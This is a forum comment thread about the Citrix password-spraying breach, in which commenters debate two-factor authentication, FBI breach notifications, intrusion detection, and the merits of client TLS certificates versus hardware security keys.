> Citrix said in a later update on April 4 that the attack was likely a result of password spraying, which attackers use to breach accounts by brute-forcing from a list of commonly used passwords that aren’t protected with two-factor authentication.
Haven't read the article, don't know anything about their network. Assuming they use a Windows domain for their corp infrastructure.
Lower level Windows authentication mechanisms can't be configured for 2FA. If your active directory domain is functional at all then at the very least your systems need to be able to talk via SMB and ldap to a domain controller. With sufficient privileges you're able to execute code on other machines via either protocol.
You only need an infected machine, not even user credentials, to be able to perform password spraying or kerberoasting attacks.
net commands, kerberos tickets, etc. You can really only 2FA web interfaces, VPNs, RDP and interactive console logons. You can 2FA LDAP, but it's a real pain to do so (I've seen it done).
Just think of any backend protocol that the system uses. The vast majority of those can't be 2FA'ed. This is not Windows specific either. The same is true for most all protocols.
This is why most companies buy firewalls and VPNs and only 2FA the VPN. That meets most compliance requirements and is simple to do. Is it secure? Probably not, but it checks the box (makes audit happy), so buy compromise insurance and move on.
I fully assume there are more hacks we don’t hear about that ones we do. Not only because of cover ups but it can’t be that hard to cover your tracks if you know what you are doing.
Presumably the attacker has some external command and control infrastructure they must use to get in and out of Citrix's networks, which is presumably what the FBI was tracking.
THIS! My brother works for a large corp that does a lot of government(and private) work. A few years back, they tightened up their security with live monitoring, and as soon as it was enabled they realized that folks from China were actively connected. FBI was involved, but it never made the news. 2-3 more attempts have been made since. While they have an idea how long they had been breached, they don't know for sure...
I assume you rather meant 'connections originating from IP addresses owned by Chinese companies'? It's trivial to use IP address from any place in the world, regardless of your actual location.
I mean from China. It was investigated and pretty conclusively linked. Is there a chance that it wasn't China? sure. But there were specific reasons that China would want to know what this company was working on, and it was more than just an IP address cross reference that pointed to them. Now don't conflate this as "US=good, China=bad" that isn't what Im saying here. Im saying that Chinese state sponsored hackers accessed their computer systems, with reasonably credible evidence.
Even more interesting is how the FBI knew they'd been infiltrated before they themselves did?
(There's the obvious conspiracy style accusation in that they were already in there poking around... but that doesn't seem to ring true in this regard)
In the Marriot hack post-mortem, they shared that one of the tools they used (which successfully identified the attack) was IBM Guardium.
> Accenture told Marriott's IT staff that one of their security products, a database monitoring system called IBM Guardium, had detected an anomaly on the Starwood guest reservation database
Seeing large amounts of encrypted traffic leaving via a DNS tunnel during non-standard business hours for instance would be an example of such an anomaly. It's not always that easy to detect however.
Simply storing netflow data and graphing it would show it at a glance. Use a machine setup as a transparent bridge with only physical login if you are paranoid about the netflow data being modified.
Hiding on a box is easy. Hiding on the wire is hard.
Correct me if I’m wrong but stuxnet was designed for a purpose and it accomplished that purpose. Eventually being discovered was no doubt an understanding from the authors.
Compare that to unauthorized access to a machine and cleaning the logs behind you... One doesn’t have to be more brilliant than the authors of stuxnet to do something illegal without getting caught.
Given that the malware was seriously breaking shit, it wasn't all that hard to catch. I'm sure that at first they were looking for bugs, and thgen it became clear that it was too intentional.
Thats the belief but was it truly ever confirmed? I dont doubt it it sounds like a meme worthy of belief and I lean towards it but I dont recall ever finding a confirmation. Also saying they were caught implies the law caught them and arrested them.
As far as I know Stuxnet didn't break any US/Isreal laws. Of course it broke Iranian laws, though.
I think Obama said "no comment" to reporters, but then basically admits it by talking about how he regrets that this information got out into the public.
What would you consider as a confirmation? Without someone coming out and saying "we're the ones who did it", it's very unlikely that it'll be ever be confirmed.
The best you can do is to make some educated guesses (by looking at the timestamps, coding patterns, comments in the code, who might be interested in hacking the target, political connotation to the attacks etc.). That's usually how state-sponsored attacks get attributed.
For example, "Guccifer" used GTM+3 settings and attacked DNC a few hours after Trump publicly "hoped" that Russians will find the emails. That doesn't confirm that it was sponsored by Russia, but it makes it an educated guess.
It actually is not if you follow a strict Least Privileged model as a basis for your security architecture...But nobody does...not because it is hard, but because they don't understand it. Security is still based around looking for all the bad; it seems this defunct model will never die.
Has anyone gotten that kind of call from the FBI and can shed light on how the process works? Would be fascinating for a outsider and provide a guide on what next steps look like for those poor souls that receive the call in the future.
I've been on this call (both sides of it) probably a dozen times by now. Gov agencies are decent at doing research so it's pretty unlikely that the FBI just called their 1800 number or whatever.
Most small start ups don't get to the level where anyone that "big" is looking at them but in the event that something does get flagged the agency will go find their CEO/CTO/counsel on LinkedIn and either message them there or email them. I've never seen an actual vulnerability disclosed in email, if it's a potential legal issue (hello SEC and fintech) they may ask that your lawyer responds to them in writing but more often it's just "this is Agent XYZ with ABC. I have information about your company, please call me immediately."
For someone bigger (like Citrix) the company is hopefully big enough to have a team that is connected to the agencies in someway. Either the agency knows someone who knows them, or they have a designated Security and Compliance team that can handle these inquires.
The real problems come when you're in the middle of sizes - too big to have eyes on every email but too small to have a real security team.
About 5 years I was working for a SaaS company and one of our clients accidentally discovered a pretty serious hole in another company's product. This client wasn't overly tech savy and was basically like "hey is this how this is supposed to work?" when it very much was not... so we killed the API connection and told the client we'd take care of it. It's about 7pm ET by the time we figure out what's going on so we call and email the other company but couldn't find anyone. In the end we got the home phone number of their CTO and had our CTO call him at around 10pm. He thought it was a prank call but once our CTO convinced him this was a problem he was able to get their on call eng to patch it within hours.
Nowadays almost any company involved in security work either has a direct line to FBI/DHS or has a vendor who does. ie if I'm some medium consumer platform I probably don't get to talk to the FBI directly, but if I called up Crowdstrike or any security consulting firm they could do that. In the event that my medium consumer platform was infiltrated by Fancy Bear (and the government decided to tell me, sometimes they don't) an FBI agent would email/call the most likely point of contact for the fastest resolution without causing panic. Lots of time the damage is already done, two vs four hours on a response won't make a big difference in the long term so no need to email info@ or anything.
Over the past 6-8 years the corporation on public/private cyber investigations has definitely changed as red tape has decreased in sharing of info has increased - even more the last 4ish years since the DNC email hacks. I've had a clients get a casual "just a heads up, you should check this out" from the government without no paperwork and no follow up, something that would have been virtually unheard of 8 years ago.
DHS gets a lot of shit in the media (lots of which is deserved) but they've done a pretty good job just opening basic lines of communication and training other agencies that spending 20 minutes looking at a random tip, and following up if needed, is actually a pretty good use of time.
just want to plug in Infragard here, specifically because of your comment around coorporation: https://www.infragard.org/. Lots of good information (U//FOUO) passed between various intelligence agencies and the private sector which you can access once you are a member.
If you'd like a full perspective of the Citrix hack three security people from Detroit discussed it on a recent episode of their show, How they got hacked:
Did you watch that? They mentioned that they don't know any more than is publicly disclosed how the attack occurred and that they were speculating. That was literally their first sentence about the attack.
I was going to say the same thing, but it sounds like it was the FBI that noticed it:
> [T]he hackers had “intermittent access” to its internal network from October 13, 2018 until March 8, 2019, two days after the FBI alerted the company to the breach.
This is extremely common. 6 months is not that long, even among competent companies that have good security. You usually hear about it from the FBI. I think the FBI forwards tips from agencies like the NSA, but they don’t tend to give much information.
It may be common, but I'll disagree it's common for companies with "good security." Password spraying doesn't work with good 2FA, nor sane login limits. I set off a flag anytime logging in from a new IP, for example.
2FA and login limits alone aren't likely to stand in the way of state-sponsored hackers.
Lots of companies still haven't upgraded to zero trust / BeyondCorp AuthN, and lots of companies don't have reproducible signed build artifacts from CI/CD with automatic policy enforcement regarding the properties that those build artifacts must have before they can be deployed.
High-profile companies that think VPNs and networking rules are a security solution have probably already been hacked and just don't know it yet.
Citrix has had 2FA for logins outside the corporate network for years. They also lock your account after 3 consecutive failed login attempts (even internally).
Not saying Citrix security is perfect, but protecting yourself from this kind of attack is certainly not as simple as "Add 2FA and limit login attempts".
Having responded to multiple incidents across sectors, can confirm that extensive reconnaissance and long term operations are becoming a norm. During one instance, the attackers were present in the system of a client for more than 18 months and had gained an amazing understanding of their operational procedures, policies and security architecture to say the least.
If you have anything of value, I absolutely guarantee you that there are hackers in your network right now.
One thing that frustrates me more than anything else is people assuming that their corporate network is safe. Your firewall and your vpc or whatever is a speed bump at best. You have to assume that you have an attacker on the desk right next to you, because you will eventually.
That's a really defeatist attitude. There are different levels of "value" and different levels of protection. Not everything is internet facing. Not everything is managed like a corp where turnover requires lots of access changes. Not everything allows you persistence in the network. And not all access is "access".
I really wish we moved past the "everybody's owned" idea. Your defence should be proportional to the value you can lose. You can monitor for the rest. And you can't guarantee the are hackers in my network. (Unless you're saying you're guilty of breaking in? ;-) )
I don’t think the grandparent says that everyone is owned, but that if your data is interesting enough, your threat model must include employees that are willingly exhilarating data, sometimes for nation states. That your first barriers are therefore assumed to be breached to those attackers.
This of course does not apply if you are not holding on to anything interesting, but it’s very easy to become interesting at a certain size, or if you have interesting customers. Still, not everybody.
Your threat exposure is not just your network. It's all of your customers and all of your vendors as well.
Recall that the Target POS hack back in 2014 happened because someone hacked the largest refrigeration contractor in western Pennsylvania, then bounced from there onto the Target Partners Online portal with legitimate credentials, and then from there in unspecified ways got onto the POS system. Obviously going from TPO to POS is a failure of Target's network security, but their network perimeter was much larger than just Target computers.
My response was triggered by "If you have anything of value". I agree with "if your data is interesting enough". Because let's be honest, barely any company qualifies for nation state embedding a worker with them. If they do, they know. But everybody has something of value.
That phenomenon is worse in environments with lots of compliance, as the security people tend to think like auditors instead of security professionals.
You need network sniffer and pattern recognition. Otherwise basically you hope some of the unusual activities will affect ids/ips (or touch internet). However if it is normal account you need some sort of intelligence to recognise and alert.
Throwaway, worked at Citrix. The unfortunate thing about this comment is that they sell Citrix Cloud as having the intelligence to detect anomalies exactly like this in your network.
Ouch. This page [0] hurts a little bit to read now. Feel free to grab their free ebook though! You'll learn how advanced analytics can help IT identify user behaviors, determine risk profiles, and assess and address potential threats
>Citrix said in a later update on April 4 that the attack was likely a result of password spraying, which attackers use to breach accounts by brute-forcing from a list of commonly used passwords that aren’t protected with two-factor authentication.
Wow. This simply reinforces the fact that humans cannot, and should not, be trusted with actively maintaining security of a system especially if there could be significant economic consequences.
Would a password manager help in this? I don't know.
Probably a hardware token which controls all and any access to a system.
I was with you up until the last paragraph, but no. That's not 2fa, that's switching one factor for another.
People should use a password manager with an rng to generate and store passwords. IT departments should run password spraying attacks themselves as well as blacklisting known-compromised passwords. There's really good tooling for this (likely the same tooling this adversary used!)
Separately from this, people should use hardware 2fa tokens whose weakest link isn't the cell phone company support.
> People should use a password manager with an rng to generate and store passwords.
[...]
> Separately from this, people should use hardware 2fa tokens whose weakest link isn't the cell phone company support.
What would be better is to support certificate based authentication in combination with a username and password. Then you have 2FA without having to share the private key. You can even get 3FA if the private key requires a passphrase to decrypt it.
Using SMS or email based 2FA is not secure (or is only as secure as the email or cell phone account as you already pointed out). Using TOTP requires sharing a secret between the device and the server.
A passphrase doesn't make it 3FA, since that is an already used factor class, what you know. 3FA is one from each category of what you know, what you have, and what you are. Depending on the implementation, what you describe may only be 1.5 factor auth.
I believe we can agree that just using a username/password for authentication is 1FA (single factor authentication). If we add a one-time token sent via SMS or email, or generated via TOTP, that's generally considered 2FA (with the username/password considered what you know and the one time token being what you have, I believe).
What I proposed was using a client-side TLS certificate in combination with the username/password for authentication. If the private key corresponding to that certificate requires a passphrase to decrypt, then it should be more than 2FA. What you know is the username/password, what you have is the private key. Whether the passphrase for that private key is considered what you know vs what you are is debatable (since, unlike the username/password or one-time token, the secret isn't shared by transmitting it over the network).
Many security people will discount everything that someone says once they see that person misapply marketing-phrases to describe security technology.
2FA does not become 3FA when adding a new passphrase to a system that already had a knowledge based entry.
A password for a private key is _never_ considered what you are. You are severely misusing security terms and will mislead people to believe that a proposed solution has greater strength than it really possesses.
> [You] will mislead people to believe that a proposed solution has greater strength than it really possesses.
Then explain how authentication via a username and password validated server side, a client-side TLS certificate validated during the negotiation of a TLS connection between the client and server, and a passphrase validated locally on the client's device is not a better solution compared to typical 2FA implementations using email, SMS, or TOTP.
Key-logger on the box your soft cert is on. Soft cert is comprised immediately, fully, and permanently. And you might never know. With email/sms, at least it's possible for you to realize they're compromised, and with TOTP the underlying keymat is likely not on the device so the attacker has to repeatedly win the race.
More importantly, this is also a false dichotomy, as the correct answer here is hardware protection of the private key, e.g. yubikey.
> Key-logger on the box your soft cert is on. Soft cert is comprised immediately, fully, and permanently.
That essentially means the entire machine is compromised and logging into any service would allow the adversary to access them. That would compromise the email and SMS routes. If they have root access to my phone (or whatever I use to store the TOTP secret), that would allow them to generate the correct one time token to log into any service that I use TOTP 2FA with.
> With email/sms, at least it's possible for you to realize they're compromised
That's assuming I check carefully and often enough. If someone brute-forces my password over IMAP, then they could read my messages without me ever knowing. But I could always check the process list on my computer to determine if a keylogger is installed.
> and with TOTP the underlying keymat is likely not on the device so the attacker has to repeatedly win the race.
It depends on the application. If someone got access to my phone, they could easily get the TOTP secret out of my GAuth app.
> the correct answer here is hardware protection of the private key, e.g. yubikey.
Except that it's not universally supported. It's not going to work with my email client nor will it work with my IRC client.
Basically, the ability for someone to log into my account by brute forcing or obtaining my credentials or being able to bypass the log on process by using the conventional second auth factor against me (by doing the same thing to my email account and/or my cell phone provider).
While U2F, as mentioned in other posts, will protect against those scenarios, it doesn't appear to support application protocols other than HTTPS.
>> Basically, the ability for someone to log into my account by brute forcing or obtaining my credentials
If that is the threat you are guarding against, that is the very reason for using different factors. In that way, you ensure that people cannot log in with credentials, even if they have them.
In the same way, an atm card cannot get you money, even if you stole it. In the case of an atm card and a pin, you need two factor classes, what you have and what you know.
Regarding the other part of your prior comment that incorrectly used 2FA, that is why Apple uses the terms separately, "two factor auth" and "two step auth". They are not the same.
>> Basically, the ability for someone to log into my account by brute forcing or obtaining my credentials
> you ensure that people cannot log in with credentials, even if they have them.
Except that you left out the second part of that sentence:
>> or being able to bypass the log on process by using the conventional second auth factor against me (by doing the same thing to my email account and/or my cell phone provider).
In that case, the person was a victim of a SIM swap scam which redirected password reset messages to the attacker's cell phone, which then allowed them to access the account.
Regardless of how I initially termed it, having another factor just local to the device one is using rather than a 3rd party service that can be compromised in a way that you may not immediately realize is a far better way of doing multi-factor or multi-step auth.
But this solution should not just be limited to the HTTP application level protocol. It should also be available for other application level protocols (IMAP, SMTP, NNTP, IRC, etc). That means that U2F needs to account for this, or we should have more support for using client-side TLS certificates as part of the authentication process.
When technical security items have been pointed out repeatedly to you, you keep answering without addressing those security points. A valid security design should understand the threats that are being guarded against instead of simply throwing out a favored design.
It seems that you're fixated on the terms used in the discussion rather than the substance of the discussion itself. I already provided an example where someone fell victim to the SIM swap scam because they had their cell phone number on file with their bank.
But rather than addressing the issues where a 3rd party serving as a second factor/step can be compromised without the account holder realizing it in time or the fact that U2F doesn't support other protocols besides HTTPS, you keep going on and on about "security points" which appear to be nebulous in the context of this discussion and also cherry-pick my responses only to go off on a largly irrelevant tangent.
This discussion could have been useful, but, unfortunately, it didn't turn out that way.
You misunderstand. I am not fixating on the terms, but the concept underlying the factors of identification. The point, which I stated in my first comment is that you are not taking into consideration the difference between 1.5 factor auth and 2 factor auth. Then, you are further compounding the security error, but discussing other issues instead of directly addressing that your solution doesn't address the threat model. That is why I asked what threats you are guarding against. There is a large body of knowledge here that may be worth your study, cf cia.
Yes, there is a fixation on security, since authentication is a security function that is often gotten wrong when people don't know the threat model and rush through a solution. This has been pointed out to you by several people more than once in this very thread.
Fido/u2f is only supported in certain places. What I'm talking about is supported by any server that supports TLS. For instance, news.ycombinator.com is running nginx. nginx supports using client-side TLS certificates. If the administrators of this website chose to enable it, they could allow me to submit a certificate signing request, sign it, and send me the resulting certificate. Then they could allow me to connect to this server using that certificate to authenticate me in addition to my username and password.
Also, this isn't tied into a specific application level protocol. This can be done over other other application level protocols like SMTP, IMAP, NNTP, IRC, etc.
From what I've read about U2F[1], you need to use Google Chrome. Just checking the preferences/settings for both Firefox and Chrome, they both have the option of importing client side TLS certificates. Thunderbird also has the option of importing client side TLS certificates.
To put it another way, my browser can tell I'm connecting to news.ycombinator.com by using the certificate authority bundle installed on my machine. I don't need any external service or new standard to accomplish this. The same principle applies to client side TLS certificates.
First, mutual auth with certs as you suggest isn't supported by "all servers which support TLS". Second, even if it was you have either a serious management headache dealing with arbitrary unsigned keys from end users or a huge management headache dealing with CSRs securely.
Third, yubikey is not only supported by chrome. I've used it with IE and Firefox just now to verify.
Fourth, yubikeys provide significant additional security as you cannot lose control of the private key without realizing it, even if your box is owned. The yubikey requires you to physically press a button to approve any action it takes with the private key. Soft certs are gone once they're decrypted in RAM (there's automation for this exact thing in many RATs).
Source: NIST has advocated for mutual auth with PIV for over a decade. They are now moving away from it and towards WebAuthn, because it's (mutual auth with certs) simply not as good.
> you have either a serious management headache dealing with arbitrary unsigned keys
Once the user installs the certificate, then their browser would use it during the TLS connection. If the signature couldn't be verified, then the connection wouldn't be established, or it could be, but without the client side TLS part of it (depending on how the webserver is configured). The login attempt could then be restricted because the client side TLS negotiation never took place.
> huge management headache dealing with CSRs securely.
Let's take a website like news.ycombinator.com. When I click on the login link, it gives me the option to provide credentials or create a new account. If I choose to create a new account, I'm asked to provide a new username and password. They could add a field that would allow me to submit a CSR along with an email address they could email the signed certificate to.
Then I could get the certificate by email, import it into my browser and then use it along with the new username and password to log in with my new account.
For equivalent online accounts, a workflow like that should be good enough.
> Third, yubikey is not only supported by chrome. I've used it with IE and Firefox just now to verify.
They should update their website. The link I cited earlier still has the following quote:
>> What browsers support the U2F-certified Yubikeys?
>> You must be running the latest version of the Google Chrome browser, which includes support for the U2F protocol. To check the version number, in your browser, click the Chrome menu in the toolbar, then select About Google Chrome. (Support for U2F is in versions 38 and later.)
>> At this time, Chrome is the only browser supported. However, Mozilla is currently building support for U2F and Microsoft is working within the FIDO Alliance to eventually bring support to Windows 10.
> Fourth, yubikeys provide significant additional security as you cannot lose control of the private key without realizing it, even if your box is owned. The yubikey requires you to physically press a button to approve any action it takes with the private key. Soft certs are gone once they're decrypted in RAM (there's automation for this exact thing in many RATs).
While this is true, is this something that I can currently use with my email/news client? What about my IRC client? I know that I can use client side TLS certificates with both.
> They are now moving away from it and towards WebAuthn, because it's (mutual auth with certs) simply not as good.
What do they plan to do to address more secure authentication over other protocols besides HTTPS?
Probably my wording was wrong. I was thinking more of a system where the password itself was generated and stored on a hardware device. The user need not interact with any application, whatsoever, like 1Password or Lastpass to generate or store a password at all. Everything happens behind the scenes on the device. The user would be responsible only for keeping the hardware device safe.
This probably makes 2FA moot for some scenerios. For scenarios where losing the token is a real risk, you would implement 2FA.
I understood you, my point is that you are sacrificing significant security with a one-factor approach, especially if that one factor is a password! You're open to attacks where the password is exposed in between the keyboard and the requestor, attacks on the distant end system, as well as attacks on the password device itself. Passwords make it tricky to audit if they've been duplicated.
Use 2fa everywhere. It's cheap, easy, and significantly more effective.
Consider the following attacks which your suggestion provides no coverage for:
- Http downgrade (both SSLstrip and export-grade downgrade)
- Spear-phish
- Key-logger
- Spear-phish
- Shoulder-surf
- Spear-phish
- Evil maid (borrows device and compromises passwords)
I do not believe that spearphishing would not be prevented by a hardware token. The device would be responsible for authenticating the identity of the service being accessed. If the user can be fooled into handing over their hardware token, I do not see it far fetched that they will not be influenced to not hand over their 2FA token.
Again, if a hardware 2FA token can deal with key-loggers, so can a password token.
Why would someone be able to shoulder-surf a display-less password token? You log on to the website, insert the device and the website proceeds to authentication without revealing anything.
Evil maid is the only legitimate attack I can agree with.
>attacks on the distant end system, as well as attacks on the password device itself.
This is not something that a hardware 2FA token is also foolproof against.
>Passwords make it tricky to audit if they've been duplicated.
This is a valid point.
My point may not be applicable for super sensitive systems but for a lot of services it should be sufficient enough. I'm saying so because I'm having a hard time getting my family/friends to use a password manager (specifically 1Password). They do not see the need, find it additionally complex and are turned off by the subscription pricing (I'm paying for my family though!). Syncing is also hard. I was hoping that a pure hardware token would make it more convenient and a one time 20-40 USD price is more palatable than 60 USD every year.
Ha. Perfect. That is exactly what I was imagining. Apologies for the long conversation.
Do you have any idea why this is not popular? Is it too hard to implement or is it just that business's do not see security as something to invest a lot in?
Most major SaaS apps support it, the major hardware provider I see recommended is yubikey although Google makes one as well. See also U2f. It's super easy to implement, try it out for yourself in Flask.
Indeed. I spent 10 or 15 minutes trying to figure out if they are selling a physical device, like a usb 'key' or are just selling 2 factor authentication with mobile phones. And I'm still none the wiser. It's pages upon pages of buzzwords and nonsense.
2FA only helps if it's a 2-way authentication mechanism like U2F.
TOPT codes are completely phish-able using ridiculously easy to setup kits out there like CredSniper[0]. Set up a MITM proxy authentication site, get the user to live authenticate through the proxy, steal the session cookie, game over.
Some of the feedback that has come out of internal campaigns has been things like "I thought the URL looked weird, but the email said it was a beta site, and I got the Duo push notification for the second factor so it seemed legitimate."
That's the real danger in 2FA mechanisms outside of U2F: people believe it protects against phishing, and it absolutely does not.
This is dangerously untrue; while totp is clearly not as secure as a hardware token, it's much more secure than just username/password. It requires the adversary to do more work, and also provides more clues for the server that something phishy is going on. It's also much easier to sell to users, especially for free-but-critical services like webmail. You're not going to convince everyone to buy a $30 hardware token to protect their free Gmail account; meet your users where they are.
By all means, move towards a hardware-based 2fa setup. But don't let that prevent intermediate steps to improve security along the way.
Your example is also deeply flawed as it can be used to steal auth tokens for 2fa sites, even if they use Fido. Mitm is game over.
How did Citrix not have 2FA in place?